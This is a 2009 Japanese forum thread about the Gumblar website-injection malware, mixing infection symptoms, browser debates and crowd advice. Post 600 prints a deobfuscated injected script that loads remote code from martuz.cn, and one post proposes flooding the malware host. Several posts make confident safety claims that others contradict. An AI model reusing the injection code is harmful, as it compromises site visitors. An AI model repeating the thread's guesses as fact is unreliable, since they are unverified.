477 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:14:43 ]
Flashとかいらないんじゃない?
無駄に凝ってて面倒臭いサイトが増えていくだけだわ

478 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:15:18 ]
Mozilla Firefox
opera

使えば何て事は無いのに・・・。


479 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:15:31 ]
>>463
/^.*\.(cn|kr)/.*$/


480 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:15:37 ]
>>458
風雪のルルで逮捕



481 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:15:48 ]
ブラウザ関係なくね?

482 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:15:59 ]
疑心暗鬼になってしまうな

483 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:16:04 ]
>>460
最近はビジネス目的だからそういうのは少ない

484 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:16:45 ]
>>462
日時についてはあてにならないです

485 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:16:47 ]
>>481
少なくとも俺のFirefoxではPDFを持ってきてくれなかった

486 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:16:48 ]
firefoxならgoogleに報告あがればブロックしてくれるな
operaだとリボンマジックそのまま開けたぞおい・・

487 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:16:53 ]
わかりやすい症状が出るとすぐ対策されるんで、症状が違ったりわかりにくくなったりしてる亜種が現れてるってことか。
>>1とかのまとめも見直す必要があるんだろうか?

488 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:17:03 ]
>>481
狐は確実に刎ねるよ


489 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:17:23 ]
gumblar.cn タイムアウトが戻る
なんでだろ まあいいことだけどw

490 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:17:24 ]
>>474
おねがいですから帰ってください



491 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:17:44 ]
>>488
なんでそうなるんだ?理由がよくわからん

492 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:18:12 ]
>>487
変化し過ぎて対応できるのだろうか?

493 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:18:41 ]
>>479
ton

494 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:18:45 ]
狐が刎ねるってより対象がIE

495 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:18:54 ]
>>481
スクリプトがIE以外はねてた
最新のスクリプトがそうかはわからんけど
今後変わるかもしれないしどれが安全とかはあんまりないとおもう

496 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:19:12 ]
相手するな
そいつに日本語は通じない

497 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:19:21 ]
>>491
火狐はgoogleの攻撃サイトDBを読み込んでるから

498 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:19:25 ]
毎度書き込まれるけど「確実」とか「大丈夫」とかないって

499 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:19:38 ]
>>494-495
なるほど。ありがとう。
一応狐使いだが油断しないようにしておく。

500 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:20:01 ]
>>491
ttp://www.dotup.org/uploda/www.dotup.org34535.png
”今のところは”大丈夫だがな



501 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:20:01 ]
Sleipnirから火狐にするのがめんどくせええ

502 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:20:15 ]
ブラウザ選ぶぐらいで安全になるようなウィルスなら脅威ではない。

503 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:20:18 ]
市販のアンチウイルスソフトいれてるから大丈夫だよね?

504 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:20:51 ]
>>498
VB入ってれば確実に大丈夫だ



505 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:21:10 ]
>>503
エラーでも起こしてるのかw

506 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:21:44 ]
>>504
そうで無くなってきた。

507 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:21:50 ]
>>503
バスターなら安心

508 名前:397 mailto:sage [2009/05/16(土) 23:22:35 ]
カスペルスキャン中暇なんでログ漁ってたら俺と似た人がいた
ただこれと違ってちゃんとカスペルが動く
更新日時確認したら2009/05/16 21:56とかなり最近、その頃PCの再起動をかけてたと思う
>>1の病状は無し。おまいらPCの再起動をかけてcmd.exeで調べてみてくれないか?


63 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:22:44
cmd.exeで実行してdir C:\WINDOWS\system32\sqlsodbc.chmでエンター押したら
ファイルが見つかりませんって出たんだけどこれはアウト?
さっきまで1個のファイル 50,727バイトって表示されてたんだけど、
まとめサイトにのってるニフティのサイト開いてKasperskyもダウンロードしたあと試したらこうなった

72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:30:24
>>65>>66
開けてるけど1個のファイル 50,727バイトって出ないとアウトなんじゃないの
でもsqlsodbc.chmプロパティ開いてみたら50,727バイトなってた。
これはセーフなのかアウトなのか・・・

78 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:38:00
>>74
カスパーインストールしようとすると「インストールノログを開くときにエラーが発生しました。
指定されたファイルの場所が存在し、書き込み可能であることを確認してください」って出てしまう



509 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:22:37 ]
>>503
ウィルスセキュリティゼロですか^^

510 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:15 ]
>>509
ウィルスセキュリティゼロだとだめなんでうsか



511 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:17 ]
あぁ、最初からIEのみを攻撃対象にしてたのか
なるほど

512 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:19 ]
とりあえずSophosに乗り換えてみた
これで安心…なのか?

513 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:31 ]
ノートン大先生がクッキーに反応したぜ
やれば出来るじゃないか。安心安心

514 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:23:35 ]
>>501
同意

515 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:44 ]
ノートン先生・・・・・・・・

516 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:50 ]
>>503
市販のソフトはドンドン無効化しているな

517 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:23:56 ]
確実に大丈夫なのは

Mozilla Firefox+ウイルスバスター



518 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:24:35 ]
>>514
めんどくさいよな

519 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:24:36 ]
こっちが胃もたれするくらいのアンチIE論者で火狐使いの知人が感染してたから、
「火狐だから大丈夫」なんて、とてもじゃないけど思えない

520 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:24:39 ]
バスターさん対応するようになったのか?
昨日まで無意味だとか言われてたように思うんだけど



521 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:24:43 ]
サイト見なければ大丈夫だろ

522 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:01 ]
俺のノートン先生は今どこに・・・?

523 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:12 ]
>>510
ウイルスに対するセキュリティがゼロだから

524 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:19 ]
>>492
セキュリティ会社が有効な対策を出すまでは、
感染した可能性があったら再インストール、に絞っちゃった方がよかったりして。

予防に関してはこれまで通りでよさそうだけど。

525 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:27 ]
>>521
そういうあなたにラブレター。

526 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:43 ]
>>519
それ本当?

527 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:49 ]
>>522
もう夜も遅いからな
俺が腕枕してやったら寝ちゃったよ

528 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:54 ]
同人板のやつ等がウイルスの挙動研究しててソレがまったくの的外れでワロタ

529 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:56 ]
ブラウザ云々以前にネサフしなきゃ問題ないだろ

530 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:26:26 ]
テンプレが危機感感じてここに来た人向けじゃないのが問題だわ

要するに

FlashPlayerとAcrobat Readerを最新にしとけばいいだけ。

セキュ板ってコミュ弱人間多すぎか長文でしか説明できない馬鹿ばかりだねぇ

 

 



531 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:27 ]
linuxならアクセスしても大丈夫だよね?今のところは
サブ機がubuntuなんだ

532 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:33 ]
なんかアレな情報が流れてるな…
スクリプトはIEとそれ以外で別のコードを返すけど
Firefoxも普通に攻撃対象に入ってる

533 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:34 ]
>>520
どうせ最新亜種には追いつけないんじゃね?

534 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:44 ]
集団ヒステリーっぷりが滑稽だな

535 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:44 ]
フォクすけ使いだけど
亜種が出まくってるこの現状で絶対安心とかは有り得ないと思うが

536 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:47 ]
>>520
設定変更で昨日まで使えていた
今は使えない

537 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:26:50 ]
>>518
だよなー
火狐ってめんどくさそうなイメージがある
オペラにしようかな

538 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:53 ]
同人サイトに感染してる事を運営に通報したら消えた!!

よし! 被害者を無くそう!

539 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:27:39 ]
u.batを検知できないの?こいつを検知できれば万が一感染しても大丈夫なんじゃね?

540 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:27:41 ]
WIN2Kにsqlsodbc.chmがあって
サイズが
サイズ        45.0 KB (46133 バイト)
ディスク場のサイズ  48.0 KB (49152 バイト)

だったんだがこれは感染してるって事でいいんだよね。
一応コマンドプロンプトやレジエディは立ち上がるけど
ウイルスソフトの更新 ・Kaspersky とニフティオンラインスキャン
は見事に失敗したし

IEなんてここ一年くらい使った事無かったのに
OPERA使いでもくらうのか このウイルス 最悪



541 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:27:46 ]
>>530
クマー

542 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:27:53 ]
gumblar.cnに田代砲撃ち込むってのは?

543 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:28:19 ]
>>538
そして全てのサイトが消失するorz

544 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:28:43 ]
過去最強なのかなぁ、このウイルス

545 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:28:52 ]
>>530
このスレの1の最初のほう見たか?
長文で騒いでるのは駆け込んできたやつらだろう

546 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:29:06 ]
>>540
オペラもだめか・・・
やっぱり火狐に鞍替えすべきなのかな

547 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:22 ]
94.229.65.160/27の範囲を教えてくださいまし。

548 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:31 ]
>>532
jscript.dllのバージョンチェックが入ってるから、実質的にIE7以下しか
攻撃対象になっていないように思うんだが、Firefoxが対象になってる
スクリプトが埋め込まれているサイトがあったら教えて。踏みに行くから。

549 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:32 ]
もうこんなウイルスだらけのネットに居られるか!
俺は専ブラに戻るからな!

550 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:39 ]
>>540
たぶんビンゴだと思うけど、そのファイルをダブルクリックするとどうなる?
本来ならヘルプファイルが開くはずなんだが。



551 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:42 ]
某乙女ゲーサイトにアクセスした
ソース見て、改行されてない横に長くて、なんか&だか#の多い部分が危ないスクリプト?

552 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:57 ]
>>542
ガトリング漢砲ってのがあったな

553 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:30:00 ]
>>546
アドビ更新すれば良いだけなんだけどな〜。



554 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:30:18 ]
ちょろめはどうかね

555 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:30:25 ]
単にIEとFirefoxで挙動が違うだけで
Firefoxも食らうんじゃね

556 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:30:33 ]
>>544
この程度が過去最強だと?

557 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:07 ]
>>526

本当。
オンラインスキャンでアウト判定でたらしい。
まぁ他のPCセキュリティ環境がいまいち分からないから
これ以上はなんとも。

558 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:17 ]
>>500
セキュリティ設定で
攻撃/偽装サイトとして報告されているサイトを表示するときに報告する
がonになってたときだけな

559 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:31 ]
>>542
何万台ものサーバーやソンビー・クライアントをコントロールできる敵に立ち向かうのか?
返り討ちにあうぞ

560 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:33 ]
NIMDA知らんのか
あれはやばかった



561 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:34 ]
山田とか苺きんたまとかそういうレベルでおもしろい奴くればいいのに
腐女子のデスクトップ丸見え

562 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:56 ]
>>557
IEプラグイン入れてたんだろ。

563 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:32:10 ]
Macなら大丈夫
この際だからお前ら全員乗り換えろ

564 名前:540 mailto:sage [2009/05/16(土) 23:32:17 ]
>>550
開いていいものなのか?
まあもうどうせ待避させてフォーマットしかないからどっちでも同じだろうけど

565 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:32:17 ]
>>558
それはあえて切らない限りはチェック入ってると思うけどな

566 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:32:34 ]
>>553
もうやってる
でも心配なんだよ

567 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:32:56 ]
アップル大勝利

568 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:01 ]
>>563
乗り換えると今度はMacが標的になるんですね、わかります

569 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:05 ]
>>564
たしかに言われてみればそうだな、やめといたほうがいいかもしれない

570 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:19 ]
>>563
  .ハ,,ハ
 ( ゚ω゚ )




571 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:21 ]
firefoxでも感染しますたorz
pdfファイルいくつか開けたからか?
これから再インスコしてきますorz

572 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:25 ]
GENOのサーバーMacだけど感染したぞw

573 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:28 ]
>>558
涙拭けよ

574 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:33 ]
火狐使い勝手悪い…でも我慢

575 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:35 ]
442 名前: スカシタゴボウ(アラバマ州)[sage] 投稿日:2009年05月16日(土) 23:32:11.00 ID:hgwQOSJu
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) にUserAgent変えたら感染しないってマジ?

576 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:50 ]
>>566
FlashもReaderも削除しろwこれなら完璧だ

577 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:54 ]
>>556
相手がadobeの脆弱性を狙ってやっているが
他の脆弱性を隠し持ってないとも限らない
いつ何時その攻撃手法に変えるかわからない

578 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:34:25 ]
>>572
食らったWinマシンが更新して改ざんしちゃったんだろ?

579 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:34:29 ]
ああ、そういやFirefoxでもIE Tabとか入れてたら
IEエンジンで読み込む場合があるな

580 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:34:29 ]
ヌルポ



581 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:34:41 ]
デフォルトなら火狐が一番危ないよ
先読みするから

582 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:01 ]
IEコンポでUAをFirefoxにしたらどうなるん?

583 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:13 ]
>>555
いや、いろいろスクリプト見たけど、ScriptEngineのバージョンチェックしてて、
対象をIE7以下のjscript.dllに絞ってるのしか見たことないんだよね。

Firefoxを対象にしているスクリプトがあるのなら、そのスクリプトを
拾いたいんだけど、見つからない。

584 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:14 ]
昼から何か進化した?

585 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:23 ]
FlashもReaderも削除したけどまだ不安だ
FlashもReaderも使わない亜種が出てくるかもしれない

586 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:24 ]
>>548
どれも同じだよ。>>324
確かにjscript.dllのバージョンチェックが入ってるんだけど、
これはobjectタグで返すかembedタグで返すかを判別するだけのコードのように思う。

587 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:26 ]
>>526
まーAdobeReaderはFirefoxからも開けるから関係ないんじゃね?
そもそもブラウザを直接狙うんじゃなくてそこから呼び出したAdobeReaderを使って感染してるみたいだし。

まさかFirefox使っておいてNoScript使ってなかったのかね

588 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:42 ]
www.trendmicro.com/vinfo/images/DOWNAD_AD/AD_01.jpg
 ワームは、UTC (協定世界時)に基づき、250のランダムなWebサイトを含むURLのリストを毎日作成します。
例えば、算定された文字列が "abcdef" の場合、ワームは、この文字列の末尾に、".biz" や
".inf" や ".org" や ".net" や ".com" の文字列を追加します。これにより、
URLは、"abcdef.biz" や "abcdef.info" や "abcdef.org" や "abcdef.net" や "abcdef.com" となります。


これはひどいwww

589 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:35:48 ]
>>581
エンジンが違うから火狐は大丈夫と何度云えば・・・。



590 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:36:03 ]
>>551
<body>タグの直前だったら可能性が高い。
でもスパム対策でメアドとかを難読化してるサイトもあるから
その情報だけでは何とも言えん。



591 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:36:08 ]
>>571
サイト教えて。

592 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:36:27 ]
最新のADOBIでも危ないと聞いたんだがマジ?

593 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:36:37 ]
ウイルス感染サイトにウイルスとは別のスクリプト埋め込んで
サイトにアクセスしたPCをランダムにtelnet飛ばして感染拡大とか

ありえないか

594 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:36:57 ]
>>571
おいサイトくらい晒してけ
何のためにこのスレいんだよ

595 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:38:15 ]
>>577
アホかw他のところ付いてきてから言えよw

596 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:38:20 ]
>>593
日本語で話せよ

597 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:38:25 ]
> pdfファイルいくつか開けたからか?

本人も特定できてないんじゃないのか

598 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:39:20 ]
>>589
油断してんじゃねーよカス
インフルエンザだって変化したんだよ

599 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:39:47 ]
Gecko系ブラウザは大丈夫って事?

600 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:40:25 ]
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;

if(
   (u.indexOf("Chrome")<0)&&
   (u.indexOf("Win")>0)&&
   (u.indexOf("NT 6")<0)&&
   (document.cookie.indexOf("miek=1")<0)&&
   (typeof(zrvzts)!=typeof("A"))
){
   zrvzts="A";
   eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
   document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
}

埋め込まれたJavaScript攻撃コードを読みやすくした奴がこれな



601 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:40:25 ]
だー、寝れない
だれか絶対に感染しない方法を確立してくれよ

602 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:40:56 ]
>>601
ネットに繋げない
これマジ最強

603 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:41:22 ]
>>601

PCをネットに接続しない。

604 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:41:28 ]
>>601
ja.wikipedia.org/wiki/Lynx_(%E3%82%A6%E3%82%A7%E3%83%96%E3%83%96%E3%83%A9%E3%82%A6%E3%82%B6)

605 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:41:58 ]
>>595
www (これはワラでなくワールドワイドウェブだwww)

606 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:42:00 ]
>>563
安全だって言われても
MacにするとYahoo MovieやBiglobeの動画見られなくなるもん

607 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:42:21 ]
もうこれでいいんじゃないか?
症状を挙げといても該当しなけりゃ安心ってわけじゃないし。

予防:
Flash PlayerとAdobe Readerを最新版にする。
Adobe ReaderでJavaScriptを無効にする。
可能であればブラウザでもJavaScriptを無効にする。

感染の確認と対策:
複数の亜種が存在し、感染後にどのような症状が現れるかはわからない。
感染した可能性があれば再インストール推奨。

608 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:42:42 ]
当分自宅のPCはメールチェックと2chしか見ない

609 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:42:46 ]
まだ不確かな材料出していきがってる奴がいるのか

610 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:42:48 ]
adobe夕方アップデートしたけど又来てるよ

みんなもチェックすると良いよ





611 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:43:06 ]
Linuxなら兵器だよな?

612 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:43:51 ]
常々申し上げているとおり
FireFoxが安全なのは標的にならなかったからです。
他に安全な理由は一切ありません。

613 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:43:52 ]
Flash PlayerとAdobe Readerの最新版って今どれ?

614 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:44:11 ]
>>601
ネットカフェいけば感染し放題だぜ!
家電量販店でもいいぜ!

615 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:44:40 ]
>>612
ブロックしてくれるのもFirefoxだけだがな

616 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:44:55 ]
>>600
これだと、ChromeとNT 6以上を除外してるだけだな。
Firefoxも対象だ。

617 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:09 ]
正直OPERAがダメだったのに狐だけが安全って気はしないんだけどどうなんだろ
今はPS3からなんでコレはいくらなんでも安全だろうがな

PDF開けんからなw
2kだといろいろあって再インスコが気が遠くなるな
不愉快だがビスタ買おうかしら

618 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:16 ]
>>600
Chromeは感染対象から外れてたのか

619 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:20 ]
>>615
え?

620 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:28 ]
>>610
flash playerのほうか?



621 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:46 ]
Google Chromeは?

622 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:57 ]
>>617
ちょっとPS3買ってくるわ

623 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:57 ]
>>547
ttp://ja.wikipedia.org/wiki/IP%E3%82%A2%E3%83%89%E3%83%AC%E3%82%B9

624 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:46:09 BE:2114127195-PLT(12500)]
safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://gumblar.cn/

>不正なソフトウェアをホストしていたかどうか
>はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。sangsangmadang.com/, wz114.com/, futuraproject.cz/ を含む 10168 個のドメインを感染させています。


10168個のドメイン・・・だと?

625 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:46:18 ]
>>613
ここの情報を基にしたり、ここで聞いたりするより、Adobeのサイト行って調べた方が確実だと思われ

626 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:46:24 ]
>>600
埋め込まれるスクリプトも進化してるんだな。これだとFirefoxも危険だ。

627 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:46:28 ]
>>622
つ ドリームキャスト

628 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:46:39 ]
このスレ5人ぐらいで回してるの?

629 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:47:02 ]
また中国か

630 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:47:22 ]
>>600
今いちばん安全なのはChromeってことか。



631 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:47:24 ]
>>501>>514>>518
Sleipnir → Firefox3 移行推進計画
ttp://ktrue.blog.shinobi.jp/Entry/387/

ここに書かれてるの片っ端から入れたら楽に乗り換えられた
今じゃアドオン探しに夢中だわ

632 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:47:27 ]
>>628
ここには俺とお前しかしないよ

633 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:47:53 ]
vistでsqlsodbc.chmファイルが3つ出てくるんだが・・
あと二つのサイズが50,004 バイト、48,663 バイト
オワタ・・?

634 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:24 ]
>>630
一番安全なのはマックに決まってるだろ

635 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:24 ]
>>619
え?
www.dotup.org/uploda/www.dotup.org34723.png

636 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:28 ]
>>632
2人だけか

637 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:32 ]
みんなスクリプトだよ

638 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:35 ]
>>629
実際には中国じゃないよ

639 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:47 ]
IE→危険
火狐→危険水域に達しつつある?

くらいのキモチでいればOK?

640 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:00 ]
内部破壊するわけでもないし
FWで十分なのになんで騒いでるんだろ・・
ここのトピの人達って情弱?



641 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:00 ]
>>633
Vistaならそれは普通

642 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:01 ]
ウィルス作った奴誰だよ
俺の貴重なホリデイをブッ潰しやがって
許せねぇ

643 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:34 ]
>>634
常々申し上げているとおり
Macが安全なのはry

644 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:38 ]
>>635
知ってたか、それGoogleの機能なんだぜ

645 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:48 ]
感染したらどうなんの?

646 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:55 ]
